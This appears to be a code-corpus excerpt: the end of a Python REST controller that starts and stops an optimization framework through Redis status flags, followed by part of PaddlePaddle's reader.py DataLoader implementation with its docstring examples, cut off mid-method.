response_msg = "Use one of the following optimizer types : " + str(available_optimizers)
response_code = 400
else:
dir = os.path.join(os.getcwd(), "optimization/resources", str(id))
if not os.path.exists(dir):
response_msg = "Id not existing"
response_code = 400
else:
redis_db = RedisDB()
flag = redis_db.get("run:" + id)
if flag is not None and flag == "running":
response_msg = "System already running"
else:
try:
msg = variable.start(id, startOFW)
if msg == 0:
response_msg = "System started succesfully"
else:
response_msg = "System could not start"
response_code = 400
except (InvalidModelException, MissingKeysException, InvalidMQTTHostException) as e:
logger.error("Error " + str(e))
redis_db.set("run:" + id, "stopped")
response_msg = str(e)
response_code = 400
else:
response_msg = "Wrong Content-Type"
response_code = 400
logger.error("Wrong Content-Type")
return response_msg, response_code
# return 'System started succesfully'
def framework_status(): # noqa: E501
"""Command for getting status of the framework
# noqa: E501
:rtype: StatusOutput
"""
results = variable.get_status()
answer_dict = {}
if len(results) > 0:
answer_dict["status"] = results
response = StatusOutput.from_dict(answer_dict)
del results
del answer_dict
# logger.debug("response: " + str(response2))
return response
def framework_stop(id): # noqa: E501
"""Command for stoping the framework
# noqa: E501
:param id: Id of the registry to be stopped
:type id: str
:rtype: None
"""
try:
redis_db = RedisDB()
flag = redis_db.get("run:" + id)
logger.debug("Flag " + str(flag))
message = ""
code = 200
if flag is not None and flag == "running":
logger.debug("System running and trying to stop")
redis_db.set("run:" + id, "stop")
time.sleep(1)
flag = redis_db.get("run:" + id)
logger.debug("Flag in stop: " + str(flag))
if flag is "stopped" or None: # TODO: is none necessary?
logger.debug("System stopped succesfully")
message = "System stopped succesfully"
elif "stopping" in flag:
message = "System stopped succesfully"
counter = 0
while ("stopping" in flag):
flag = redis_db.get("run:" + id)
counter = counter + 1
if counter >= 15:
message = "system stopped succesfully"
break
else:
time.sleep(1)
logger.debug("System stopped succesfully")
else:
message = "Problems while stopping the system"
code = 500
elif flag is not None and flag == "stopped":
logger.debug("System already stopped")
message = "System already stopped"
elif flag is None:
logger.debug("System already stopped")
message = "System already stopped"
except Exception as e:
logger.error(e)
message = "Error stoping the system"
code = 500
return message, code
|
reader.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import core
import sys
import six
import numpy as np
import threading
import paddle
from .framework import Program, Variable, program_guard, default_main_program, default_startup_program, in_dygraph_mode, cpu_places, _current_expected_place
from .executor import global_scope
from .data_feeder import DataFeeder, BatchedTensorProvider
from .multiprocess_utils import multiprocess_queue_set, CleanupFuncRegistrar, _cleanup_mmap, _cleanup, _set_SIGCHLD_handler
from .dataloader import BatchSampler, Dataset, IterableDataset
from .dataloader.dataloader_iter import _DataLoaderIterSingleProcess, _DataLoaderIterMultiProcess, _DatasetKind, default_collate_fn
from .dataloader.batch_sampler import _InfiniteIterableSampler
from .layers.io import monkey_patch_reader_methods, _copy_reader_var_, double_buffer
from .unique_name import UniqueNameGenerator
import logging
import warnings
### Dygraph DataLoader configs ###
import os
import multiprocessing
import signal
# NOTE: queue has a different name in python2 and python3
if six.PY2:
import Queue as queue
else:
import queue
# NOTE: [ avoid hanging & failed quickly ] These value is used in getting data from another process
QUEUE_GET_TIMEOUT = 60
__all__ = ['PyReader', 'DataLoader', 'default_collate_fn']
data_loader_unique_name_generator = UniqueNameGenerator()
KEEP_DATA_LOADER_ORDER = True
USE_PINNED_MEMORY = None
def keep_data_loader_order(*args):
global KEEP_DATA_LOADER_ORDER
if len(args) == 0:
return KEEP_DATA_LOADER_ORDER
else:
assert len(args) == 1 and isinstance(args[0], bool)
KEEP_DATA_LOADER_ORDER = args[0]
def use_pinned_memory(*args):
global USE_PINNED_MEMORY
if len(args) == 0:
return USE_PINNED_MEMORY
else:
assert len(args) == 1 and isinstance(args[0], bool)
USE_PINNED_MEMORY = args[0]
def _convert_places(places):
if not isinstance(places, (list, tuple)):
places = [places]
ret = []
for p in places:
if not isinstance(p, core.Place):
tmp = core.Place()
tmp.set_place(p)
p = tmp
ret.append(p)
return ret
# NOTE(chenweihang): _reader_process_loop must be top level method to be pickled
def _reader_process_loop(batch_reader, data_queue):
try:
# set signal handler
core._set_process_signal_handler()
# NOTE: [ mmap files clear ] When the child process exits unexpectedly,
# some shared memory objects may have been applied for but have not yet
# been put into the inter-process Queue. This part of the object needs
# to be cleaned up when the process ends.
CleanupFuncRegistrar.register(_cleanup_mmap)
for batch in batch_reader():
tensor_list = core._convert_to_tensor_list(batch)
data_queue.put(tensor_list)
core._remove_tensor_list_mmap_fds(tensor_list)
data_queue.put(None)
except KeyboardInterrupt:
# NOTE: Main process will raise KeyboardInterrupt anyways, ignore it in child process
pass
except:
six.reraise(*sys.exc_info())
class DataLoaderBase(object):
def __init__(self):
self._places = None
def __call__(self):
return self
def next(self):
'''
Get the next item in the DataLoader object. This method
should not be called by users directly. It is used for
implementing iterator protocol of Python 2.x inside
PaddlePaddle framework.
'''
return self.__next__()
def __iter__(self):
raise NotImplementedError()
def __next__(self):
raise NotImplementedError()
@classmethod
def _check_input_array(cls, item):
arr = np.asarray(item)
if arr.dtype == np.object:
raise TypeError(
"\n\tFaild to convert input data to a regular ndarray :\n\t* Usually "
"this means the input data contains nested lists with different lengths. "
"\n\t* Check the reader function passed to 'decorate_batch_generator'"
" to locate the data causes this issue.\n\t* Please consider using "
"'fluid.create_lod_tensor' to convert it to a LoD-Tensor.")
return arr
class DataLoader(object):
"""
DataLoader prodives an iterator which iterates given dataset
once by the batch_sampler.
DataLoader supports single-process and multi-prcess data loading,
multi-process workers will be used to load data asynchronously if
:attr:`num_workers` is set as a positive number.
DataLoader only supports map-style dataset(can get a sample from
dataset with a given index) currently, for a map-style dataset,
please see :code:`paddle.io.Dataset`.
batch_sampler please see :code:`paddle.io.BatchSampler`
Args:
dataset(Dataset): the dataset to load data from, should be an
instance of subclass of :code:`paddle.io.Dataset` or
:code:`paddle.io.IterableDataset`.
feed_list (list(Tensor)|tuple(Tensor)): feed variable list.
The variables should be created by :code:`fluid.data()`.
:attr:`feed_list` must be set if :attr:`return_list` is
False. Default None.
places(list(Place)|tuple(Place)|optional): a list of Place,
to put data onto, :attr:`places` can be None, if
:attr:`places` is None, default place(CPUPlace or CUDAPlace(0))
will be used. Default None.
return_list (bool): whether the return value on each device is
presented as a list. If :attr:`return_list=False`, the return
value on each device would be a dict of str -> LoDTensor, where
the key of the dict is the name of each fed variables. If
:attr:`return_list=True`, the return value on each device would
be a list(LoDTensor). :attr:`return_list` can only be True
in dynamic graph mode. Default False.
batch_sampler(BatchSampler): an instance of `paddle.io.BatchSampler`
to generate batch indices to draw samples from :attr:`dataset`
and combine a batch. Default None.
batch_size(int): sample number in a mini-batch, a substitution
parameter for :attr:`batch_sampler`, if :attr:`batch_sampler`
is not set, a default `paddle.io.BatchSampler` will be used
and initialize by :attr:`batch_size`, :attr:`shuffle` and
:attr:`drop_last`. Default 1.
shuffle(bool): whther to shuffle indices order before genrate
batch indices, a substitution parameter for :attr:`batch_sampler`
see :attr:`batch_size`. Default False.
drop_last(bool): whether drop the last incomplete batch dataset size
is not divisible by the batch size, a substitution parameter
for :attr:`batch_sampler`, see :attr:`batch_size`. Default False
collate_fn(callable): function to generate mini-batch data by merging
the sample list, None for only stack each fields of sample in axis
0(same as :attr::`np.stack(..., axis=0)`). Default None
num_workers(int): the number of subprocess to load data, 0 for no
subprocess used and loading data in main process. Default 0
use_buffer_reader (bool): whether to use bufferred reader.
If use_buffer_reader=True, the DataLoader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data. Default True.
use_shared_memory (bool): whether to use shared memory to speed up
putting data into inter-process queue, set :attr:`use_shared_memory`
as True only when the shared memory space on your machine(e.g.
space of '/dev/shm' on Linux operating sysytem) is large enough.
Shared memory will only be enabled in multi-process mode(num_workers
> 0). Default True.
timeout(int): the timeout value for getting data form output queue
of subprocesses. Default 0.
worker_init_fn(callable): init function which will be called with
worker id on each subproces starting if not set as None. Default
None.
Returns:
DataLoader: an iterable object for data iterating, each elemnet of the generated data is a Tensor.
Examples:
.. code-block:: python
import numpy as np
import paddle
import paddle.fluid as fluid
from paddle.io import Dataset, BatchSampler, DataLoader
BATCH_NUM = 20
BATCH_SIZE = 16
EPOCH_NUM = 4
IMAGE_SIZE = 784
CLASS_NUM = 10
USE_GPU = False # whether use GPU to run model
# define a random dataset
class RandomDataset(Dataset):
def __init__(self, num_samples):
self.num_samples = num_samples
def __getitem__(self, idx):
image = np.random.random([IMAGE_SIZE]).astype('float32')
label = np.random.randint(0, CLASS_NUM - 1, (1, )).astype('int64')
return image, label
def __len__(self):
return self.num_samples
dataset = RandomDataset(BATCH_NUM * BATCH_SIZE)
# get places
places = fluid.cuda_places() if USE_GPU else fluid.cpu_places()
# --------------------- dygraph mode --------------------
class SimpleNet(fluid.dygraph.Layer):
def __init__(self):
super(SimpleNet, self).__init__()
self.fc = fluid.dygraph.nn.Linear(IMAGE_SIZE, CLASS_NUM, act='softmax')
def forward(self, image, label=None):
return self.fc(image)
with fluid.dygraph.guard(places[0]):
simple_net = SimpleNet()
opt = fluid.optimizer.SGD(learning_rate=1e-3,
parameter_list=simple_net.parameters())
loader = DataLoader(dataset,
batch_size=BATCH_SIZE,
shuffle=True,
drop_last=True,
num_workers=2)
for e in range(EPOCH_NUM):
for i, (image, label) in enumerate(loader()):
out = simple_net(image)
loss = fluid.layers.cross_entropy(out, label)
avg_loss = fluid.layers.reduce_mean(loss)
avg_loss.backward()
opt.minimize(avg_loss)
simple_net.clear_gradients()
print("Epoch {} batch {}: loss = {}".format(e, i, np.mean(loss.numpy())))
# -------------------------------------------------------
# -------------------- static graph ---------------------
paddle.enable_static()
def simple_net(image, label):
fc_tmp = fluid.layers.fc(image, size=CLASS_NUM, act='softmax')
cross_entropy = fluid.layers.softmax_with_cross_entropy(image, label)
loss = fluid.layers.reduce_mean(cross_entropy)
sgd = fluid.optimizer.SGD(learning_rate=1e-3)
sgd.minimize(loss)
return loss
image = fluid.data(name='image', shape=[None, IMAGE_SIZE], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
loss = simple_net(image, label)
exe = fluid.Executor(places[0])
exe.run(fluid.default_startup_program())
prog = fluid.CompiledProgram(fluid.default_main_program()).with_data_parallel(loss_name=loss.name)
loader = DataLoader(dataset,
feed_list=[image, label],
batch_size=BATCH_SIZE,
shuffle=True,
drop_last=True,
num_workers=2)
for e in range(EPOCH_NUM):
for i, data in enumerate(loader()):
l = exe.run(prog, feed=data, fetch_list=[loss], return_numpy=True)
print("Epoch {} batch {}: loss = {}".format(e, i, l[0][0]))
# -------------------------------------------------------
.. note::
For reading iterable dataset with multiprocess Dataloader,
please see :code:`paddle.io.IterableDataset`
"""
def __init__(self,
dataset,
feed_list=None,
places=None,
return_list=False,
batch_sampler=None,
batch_size=1,
shuffle=False,
drop_last=False,
collate_fn=None,
num_workers=0,
use_buffer_reader=True,
use_shared_memory=True,
timeout=0,
worker_init_fn=None):
self.return_list = return_list
self.collate_fn = collate_fn
self.use_buffer_reader = use_buffer_reader
self.worker_init_fn = worker_init_fn
assert isinstance(dataset, Dataset), \
"dataset should be subclass instance of paddle.io.Dataset"
self.dataset = dataset
if not return_list and not in_dygraph_mode():
assert feed_list is not None, \
"feed_list should be set when return_list=False"
self.feed_list = feed_list
if places is None:
places = _current_expected_place()
self.places = _convert_places(places)
assert num_workers >= 0, "num_workers should be a non-negative value"
if num_workers > 0 and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"DataLoader with multi-process mode is not supported on MacOs and Windows currently." \
" Please use signle-process mode with num_workers = 0 instead")
num_workers = 0
self.num_workers = num_workers
self.use_shared_memory = use_shared_memory
if use_shared_memory and num_workers == 0:
self.use_shared_memory = False
assert timeout >= 0, "timeout should be a non-negative value"
self.timeout = timeout
if isinstance(dataset, IterableDataset):
self.dataset_kind = _DatasetKind.ITER
if shuffle:
raise ValueError(
"IterableDataset not support shuffle, but got shuffle={}".
format(shuffle))
if batch_sampler is not None:
raise ValueError(
"IterableDataset expect unspecified batch_sampler")
else:
self.dataset_kind = _DatasetKind.MAP
if batch_sampler is not None:
assert isinstance(batch_sampler, BatchSampler), \
"batch_sampler should be None or subclass instance " \
"of paddle.io.BatchSampler"
assert batch_size == 1 and not shuffle and not drop_last, \
"batch_size/shuffle/drop_last should not be set when " \
"batch_sampler is given"
self.batch_sampler = batch_sampler
else:
assert batch_size is not None and batch_size > 0, \
"batch_size should be a positive value when " \
"batch_sampler is not given"
if isinstance(dataset, IterableDataset):
self.batch_sampler = _InfiniteIterableSampler(dataset,
batch_size)
else:
self.batch_sampler = BatchSampler(
dataset=dataset,
batch_size=batch_size,
shuffle=shuffle,
drop_last=drop_last)
self.pin_memory = False
if in_dygraph_mode():
self.pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
def __len__(self):
return len(self.batch_sampler)
def __iter__(self):
if self.num_workers == 0:
return _DataLoaderIterSingleProcess(self)
else:
return _DataLoaderIterMultiProcess(self)
def __call__(self):
return self.__iter__()
@staticmethod
def from_generator(feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
use_multiprocess=False,
drop_last=True):
"""
.. note::
**The framework ensures that the data loading order of DataLoader is exactly the same as the user-defined data source.**
Create a DataLoader object for loading data from Python generator.
Data would be prefetched using Python thread and be pushed
into a queue asynchronously.
The created DataLoader object provides 3 methods to set the data source
:code:`set_sample_generator` , :code:`set_sample_list_generator` and
:code:`set_batch_generator` . Please see the following example codes
to know their usages.
If iterable = True, the created DataLoader object is a Python generator
object, which is iterable using for-range loop.
If iterable = False, the created DataLoader object provides
:code:`start()` and :code:`reset()` method to control the data reading
process. This mode is designed to be compatible with the
:code:`fluid.layers.py_reader` interface. Users can migrate the codes
from :code:`fluid.layers.py_reader` to :code:`fluid.io.DataLoader`
easily when using iterable=False.
Args:
feed_list (list(Variable)|tuple(Variable)): feed variable list.
The variables should be created by :code:`fluid.data()`.
capacity (int): capacity of the queue maintained in DataLoader.
The unit is batch number. Set larger capacity if your reader
is fast.
use_double_buffer (bool): whether to use double_buffer_reader.
If use_double_buffer=True, the DataLoader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data.
iterable (bool): whether the created DataLoader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
the name of each fed variables. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
use_multiprocess (bool): whether to use multi-process to speed up
the data loading process in dygraph. Note: this parameter only
can be used in the dygraph mode. In the static graph mode,
whether this parameter is set or not has no effect.
The Default value is False.
drop_last (bool): whether to drop the last batches whose number is
less than the CPU core/GPU card number. The default value is
True. In training phase, users should not set drop_last=False,
because all CPU cores/GPU cards must read data from DataLoader.
In inference phase, users can set drop_last=False, so that the
last batches whose number is less than the CPU core/GPU card
number can be tested.
Returns:
loader (DataLoader): the created DataLoader object.
Examples 1:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
BATCH_NUM = 10
BATCH_SIZE = 16
EPOCH_NUM = 4
CLASS_NUM = 10
ITERABLE = True # whether the created DataLoader object is iterable
USE_GPU = False # whether to use GPU
DATA_FORMAT = 'batch_generator' # data format of data source user provides
def simple_net(image, label):
fc_tmp = fluid.layers.fc(image, size=CLASS_NUM)
cross_entropy = fluid.layers.softmax_with_cross_entropy(image, label)
loss = fluid.layers.reduce_mean(cross_entropy)
sgd = fluid.optimizer.SGD(learning_rate=1e-3)
sgd.minimize(loss)
return loss
def get_random_images_and_labels(image_shape, label_shape):
image = np.random.random(size=image_shape).astype('float32')
label = np.random.random(size=label_shape).astype('int64')
return image, label
# If the data generator yields one sample each time,
# use DataLoader.set_sample_generator to set the data source.
def sample_generator_creator():
def __reader__():
for _ in range(BATCH_NUM * BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
yield image, label
return __reader__
# If the data generator yield list of samples each time,
# use DataLoader.set_sample_list_generator to set the data source.
def sample_list_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
sample_list = []
for _ in range(BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
sample_list.append([image, label])
yield sample_list
return __reader__
# If the data generator yields a batch each time,
# use DataLoader.set_batch_generator to set the data source.
def batch_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
batch_image, batch_label = get_random_images_and_labels([BATCH_SIZE, 784], [BATCH_SIZE, 1])
yield batch_image, batch_label
return __reader__
# If DataLoader is iterable, use for loop to train the network
def train_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
for data in loader():
exe.run(prog, feed=data, fetch_list=[loss])
# If DataLoader is not iterable, use start() and reset() method to control the process
def train_non_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
loader.start() # call DataLoader.start() before each epoch starts
try:
while True:
exe.run(prog, fetch_list=[loss])
except fluid.core.EOFException:
loader.reset() # call DataLoader.reset() after catching EOFException
def set_data_source(loader, places):
if DATA_FORMAT == 'sample_generator':
loader.set_sample_generator(sample_generator_creator(), batch_size=BATCH_SIZE, drop_last=True, places=places)
elif DATA_FORMAT == 'sample_list_generator':
loader.set_sample_list_generator(sample_list_generator_creator(), places=places)
elif DATA_FORMAT == 'batch_generator':
loader.set_batch_generator(batch_generator_creator(), places=places)
else:
raise ValueError('Unsupported data format')
image = fluid.data(name='image', shape=[None, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
# Define DataLoader
loader = fluid.io.DataLoader.from_generator(feed_list=[image, label], capacity=16, iterable=ITERABLE)
# Define network
loss = simple_net(image, label)
# Set data source of DataLoader
#
# If DataLoader is iterable, places must be given and the number of places must be the same with device number.
# - If you are using GPU, call `fluid.cuda_places()` to get all GPU places.
# - If you are using CPU, call `fluid.cpu_places()` to get all CPU places.
#
# If DataLoader is not iterable, places can be None.
places = fluid.cuda_places() if USE_GPU else fluid.cpu_places()
set_data_source(loader, places)
exe = fluid.Executor(places[0])
exe.run(fluid.default_startup_program())
prog = fluid.CompiledProgram(fluid.default_main_program()).with_data_parallel(loss_name=loss.name)
if loader.iterable:
train_iterable(exe, prog, loss, loader)
else:
train_non_iterable(exe, prog, loss, loader)
'''
Users can use return_list = True in dygraph mode.
'''
with fluid.dygraph.guard(places[0]):
loader = fluid.io.DataLoader.from_generator(capacity=2, return_list=True)
set_data_source(loader, places[0])
for image, label in loader():
relu = fluid.layers.relu(image)
assert image.shape == [BATCH_SIZE, 784]
assert label.shape == [BATCH_SIZE, 1]
assert relu.shape == [BATCH_SIZE, 784]
Examples 2:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
import os
# We use 2 CPU cores to run inference network
os.environ['CPU_NUM'] = '2'
# The data source has only 3 batches, which can not be
# divided evenly to each CPU core
def batch_generator():
for i in range(3):
yield np.array([i+1]).astype('float32'),
x = fluid.data(name='x', shape=[None], dtype='float32')
y = x * x
def run_inference(drop_last):
loader = fluid.io.DataLoader.from_generator(feed_list=[x],
capacity=8, drop_last=drop_last)
loader.set_batch_generator(batch_generator, fluid.cpu_places())
exe = fluid.Executor(fluid.CPUPlace())
prog = fluid.CompiledProgram(fluid.default_main_program())
prog = prog.with_data_parallel()
result = []
for data in loader():
each_ret, = exe.run(prog, feed=data, fetch_list=[y])
result.extend(each_ret)
return result
# Set drop_last to True, so that the last batch whose
# number is less than CPU core number would be discarded.
print(run_inference(drop_last=True)) # [1.0, 4.0]
# Set drop_last to False, so that the last batch whose
# number is less than CPU core number can be tested.
print(run_inference(drop_last=False)) # [1.0, 4.0, 9.0]
"""
if in_dygraph_mode():
return DygraphGeneratorLoader(feed_list, capacity,
use_double_buffer, iterable,
return_list, use_multiprocess)
else:
return GeneratorLoader(feed_list, capacity, use_double_buffer,
iterable, return_list, drop_last)
@staticmethod
def from_dataset(dataset, places, drop_last=True):
"""
Create an iterable DataLoader object for loading data from Dataset.
Dataset is only supported in Linux system currently.
Args:
dataset (InMemoryDataset|QueueDataset): the dataset object.
places (list(CUDAPlace)|list(CPUPlace)): places where the result
data should be converted.
drop_last (bool): whether to drop the last batch whose sample
number is less than batch size. If drop_last = True, they
would be dropped. If drop_last = False, they would be kept.
Returns:
loader (DataLoader): the created DataLoader object, which can be
treated as a Python generator.
Examples:
.. code-block:: python
import paddle.fluid as fluid
image = fluid.data(name='image', shape=[None, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
dataset = fluid.DatasetFactory().create_dataset("QueueDataset")
dataset.set_batch_size(32)
dataset.set_filelist(['a.txt', 'b.txt', 'c.txt'])
dataset.set_use_var([image, label])
dataset.set_pipe_command('cat')
loader = fluid.io.DataLoader.from_dataset(dataset, fluid.cpu_places())
"""
return DatasetLoader(dataset, places, drop_last)
class DygraphGeneratorLoader(DataLoaderBase):
"""
The GeneratorLoader of dygraph
The multiprocess dygraph GeneratorLoader's most functions are different from
static graph GeneratorLoader, Separate implementation to keep code readable.
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=True,
use_multiprocess=False):
self._batch_reader = None
self._places = None
self._feed_list = feed_list
if not capacity:
raise ValueError("Please give value to capacity.")
self._capacity = capacity
self._use_double_buffer = use_double_buffer
if not iterable:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports iterable mode only. Change to iterable mode."
)
self._iterable = True
if not return_list:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports returning as list only. Change to return as list."
)
self._return_list = True
# NOTE: the multiprocessing in different platform is incompatible, we will solve it later
self._use_multiprocess = use_multiprocess
if self._use_multiprocess and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"NOTE: DygraphGeneratorLoader with multiprocess mode is not currently supported on MacOs and Windows."
)
self._use_multiprocess = False
if self._use_multiprocess:
# NOTE: the multiprocessing.Queue used to save loading data in self._process
self._data_queue = None
# NOTE: this process is used to load data asynchronously from self._batch_reader
self._process = None
# NOTE: the C++ LoDTensorBlockingQueue instance
self._blocking_queue = None
# NOTE: 1. In multiprocess mode, this thread is used to get next batch data from
# self._data_queue, then push it into self._blocking_queue; 2. In singleprocess
# mode, this thread is used to get next batch data from self._batch_reader, then
# push it into self._blocking_queue
self._thread = None
self._pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
@property
def queue(self):
return self._blocking_queue
@property
def iterable(self):
return self._iterable
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except queue.Empty:
break
global multiprocess_queue_set
multiprocess_queue_set.remove(self._data_queue)
def _wait_thread_ends(self):
thread = self._thread
if thread is not None:
self._blocking_queue.close()
thread.join()
def _wait_process_ends(self):
process = self._process
if process is not None:
process.join()
# erase process id
core._erase_process_pids(id(self))
def _init_iterable(self):
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
self._var_names = []
self._shapes = []
self._dtypes = []
self._need_check_feed = []
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, False)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer, True,
self._pin_memory)
def _start(self):
if self._use_multiprocess:
# clear old _data_queue and remove it from multiprocess_queue_set
self._clear_and_remove_data_queue()
# set data_queue and process
self._data_queue = multiprocessing.Queue(self._capacity)
# add _data_queue into global queue set
global multiprocess_queue_set
multiprocess_queue_set.add(self._data_queue)
self._process = multiprocessing.Process(
target=_reader_process_loop,
args=(self._batch_reader, self._data_queue))
self._process.daemon = True
self._process.start()
# Set child process signal handler
# NOTE: [ avoiding hang ] 1. if the child process dies due to bus error/segfault
# or just hang, the main process will hang waiting for data, so here need to deal
# with SIGSEGV and SIGBUS of child process; 2. if the main process end before child
# process, it shuts the all its daemonic children down with a SIGTERM (instead of
# joining them without a timeout), so here nedd to deal with SIGTERM.
core._set_process_pids(id(self), [self._process.pid])
_set_SIGCHLD_handler()
# Set reader_thread
self._thread_done_event = threading.Event()
self._thread = threading.Thread(
target=self._reader_thread_loop_for_multiprocess)
self._thread.daemon = True
self._thread.start()
else:
self._thread = threading.Thread(
target=self._reader_thread_loop_for_singleprocess)
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._reader.reset()
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._batch_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
return self._reader.read_next_var_list()
except StopIteration:
self._reset()
six.reraise(*sys.exc_info())
def _exit_thread_expectedly(self):
self._thread_done_event.set()
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
self._blocking_queue.kill()
logging.error("DataLoader reader thread raised an exception!")
def _reader_thread_loop_for_multiprocess(self):
while not self._thread_done_event.is_set():
try:
# NOTE: [ avoid hanging ] Even with carefully designed data dependencies
# (i.e., a put() always corresponding to a get()), hanging on get() can
# still happen when data in queue is corrupted (e.g., due to
# Queue.cancel_join_thread or unexpected exit). So we set a timeout whenever
# we try to get data from `data_queue`
# NOTE: [ avoid failed quickly ] Here, the time setting of QUEUE_GET_TIMEOUT
# is relatively long, currently it is 60 seconds, because in some models,
# if the reader child process starts with a heavy burden, the child process
# has no enough time to put the data in the queue when the main process
# start trying to get data from queue. At this time, the child thread needs
# to wait slightly longer
tensor_list = self._data_queue.get(timeout=QUEUE_GET_TIMEOUT)
except:
# NOTE [ avoid handing ] After adding the shared memory mechanism, not only
# the queue.Empty exception will occur here, but other exceptions will also
# occur, such as mmap failure. If it is not handled here, it will hang.
self._exit_thread_unexpectedly()
logging.error(
"DataLoader reader thread failed to read data from the multiprocessing.Queue."
)
six.reraise(*sys.exc_info())
if not self._thread_done_event.is_set():
if tensor_list is not None:
try:
array = core.LoDTensorArray()
for tensor in tensor_list:
array.append(tensor)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
else:
self._exit_thread_expectedly()
def _reader_thread_loop_for_singleprocess(self):
try:
for sample in self._batch_reader():
array = core.LoDTensorArray()
for item in sample:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._blocking_queue.push(array):
break
self._blocking_queue.close()
self._thread = None
except Exception:
self._blocking_queue.kill()
self._thread = None
logging.warning(
"DygraphDataLoader reader thread raised an exception.")
six.reraise(*sys.exc_info())
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
return self
def set_sample_list_generator(self, reader, places=None):
def __batch_reader_impl__():
for batch in reader():
slots = []
for items in batch:
for i, item in enumerate(items):
if len(slots) < len(items):
slots.append([item])
else:
slots[i].append(item)
yield slots
self.set_batch_generator(__batch_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
self._batch_reader = reader
if places is None:
places = _current_expected_place()
self._places = _convert_places(places)
assert len(self._places) == 1, \
"Number of places must be 1 in imperative mode"
return self
class GeneratorLoader(DataLoaderBase):
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
drop_last=True):
self._tensor_reader = None
self._places = None
self._thread = None
self._queue = None
self._feed_list = feed_list
self._exited = False
self._drop_last = drop_last
self._keep_order = keep_data_loader_order()
if not capacity:
raise ValueError("Please give value to capacity.")
self._iterable = iterable
self._return_list = return_list
if not self._feed_list:
raise Exception("Feed list must be given under static mode.")
self._use_double_buffer = use_double_buffer
self._capacity = capacity
if not self._iterable:
self._init_non_iterable()
def _wait_thread_ends(self):
# Get self._thread first to prevent data race, because __thread_main__
# would set self._thread be None at the end
thread = self._thread
if thread is not None and self._iterable:
self._queue.close()
thread.join()
def _init_iterable(self):
self._wait_thread_ends()
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
self._queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, self._keep_order)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer,
self._drop_last, False)
def _init_non_iterable(self):
lod_levels = []
dtypes = []
shape_concat = []
ranks = []
shapes = []
need_check_feed = []
for feed_data in self._feed_list:
dtypes.append(feed_data.dtype)
shape_concat.extend(feed_data.shape)
ranks.append(len(feed_data.shape))
shapes.append(feed_data.shape)
lod_levels.append(feed_data.lod_level)
need_check_feed.append(int(feed_data.desc.need_check_feed()))
queue_name = data_loader_unique_name_generator(
'lod_tensor_blocking_queue')
reader_name = data_loader_unique_name_generator('create_py_reader')
double_buffer_name = data_loader_unique_name_generator('double_buffer')
var = global_scope().var(queue_name)
self._queue = core.init_lod_tensor_blocking_queue(var, self._capacity,
self._keep_order)
if self._keep_order:
block = default_main_program().current_block()
else:
block = default_startup_program().current_block()
reader_var = block.create_var(name=reader_name)
